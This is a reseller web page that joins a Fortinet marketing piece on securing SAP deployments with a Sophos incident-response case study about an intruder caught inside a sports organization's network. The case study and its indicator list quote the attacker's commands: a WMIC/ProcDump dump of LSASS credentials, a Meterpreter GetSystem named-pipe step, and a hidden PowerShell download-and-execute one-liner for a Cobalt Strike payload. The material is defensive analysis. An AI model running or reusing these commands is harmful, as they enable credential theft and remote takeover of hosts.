ERP systems can be a target for bad actors as they provide access to a vast range of business information systems, including financial data, production systems, development, employee data, and more. Some of these attacks could be aimed at well-known SAP apps such as Fiori—S/4HANA’s web interface, the new user experience (UX) for SAP software and applications. It provides access to a set of applications that are used in regular business functions, like work approvals, financial apps, calculation apps, and various self-service apps. For organizations looking to enhance the security for their SAP deployments, Fortinet’s Dynamic Cloud security offerings provide visibility and control across cloud infrastructures, ensuring secure connectivity from the data center to the cloud. 

Consider the following to enhance the security for SAP deployments:

  1. A web-application firewall (WAF) to block web attacks, such as code injection, cross-site scripting, or SQL injection. Because these attacks may be based on zero-day threats, the WAF should utilize machine learning to differentiate between normal and abnormal traffic and should utilize sandboxing and AI-driven threat feeds to detect new attack types. The WAF should also secure API interfaces using API calls. 
  2. Cloud-based network firewalls to secure network traffic—including internal segmentation to reduce the extent of trust domains. In a zero-trust environment, all traffic should be encrypted, however, doing so may introduce performance issues—so firewall performance will be a key attribute.
  3. An IPS (Intrusion Prevention System) to block attacks targeting system vulnerabilities.
  4. Data Loss Prevention tools to block sensitive or confidential information leakage.
  5. Cloud-native workload protection and/or CASB to monitor security policies, configuration, usage patterns, and compliance with security policies.

In addition to the above, endpoint protection, network access controls, central management, and centralized analytics should all be part of the security infrastructure if not already. In fact, the pillars of cybersecurity need to be brought into play—Security-Driven Networking for segmentation and securing data, Zero Trust Access (including endpoint security) to protect against identity theft-driven attacks, cloud security to secure data in the cloud and to identify misconfiguration and risk factors, and robust AI-Driven Security Operations to ensure timely threat feeds and remediation. Of course, all these should be woven into a broad, integrated, and automated cybersecurity platform, like the Fortinet Security Fabric, supported by a shared analytics and management plane.

Fortinet Can Help

Fortinet Dynamic Cloud Security Solutions can provide the necessary visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud.

Fortinet recently published a white paper on securing SAP deployments detailing the tools and architecture approach for different scenarios. Learn more about how to enhance the security for your SAP S/4HANA deployment by downloading the paper.

Learn how Fortinet’s dynamic cloud security solutions provide increased visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud. 

Read these customer case studies to see how Hillsborough Community College and WeLab implement Fortinet’s dynamic cloud security solutions for secure connectivity from data center to the cloud. 

Engage in our Fortinet user community (Fuse). Share ideas and feedback, learn more about our products and technology, or connect with peers.

As Fortinet partners, Net Universe offers all Fortinet devices and subscriptions with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit
You can visit our Shop Online

An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was of a legitimate Microsoft’s Sysinternals tool. ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:Windowssystem32cmd.exe /C wmic /node:"SERVER NAME" process call create "C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

With the knowledge that the adversary was using the Meterpreter, this would indicate they must have some kind of network connection to remotely send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify –Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.


The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet ,making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to action on their objectives, catching them while they were still in the network propagation stages, laterally moving and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.


ProcDump of LSASS C:Windowssystem32cmd.exe /C wmic /node:”SERVER NAME” process call create “C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp”
Meterpreter GetSystem C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7
C2 IPv4
C2 payload URL
C2 port (Cobalt Strike) 50050
PowerShell to download and invoke Cobalt Strike payload “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘’))”

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit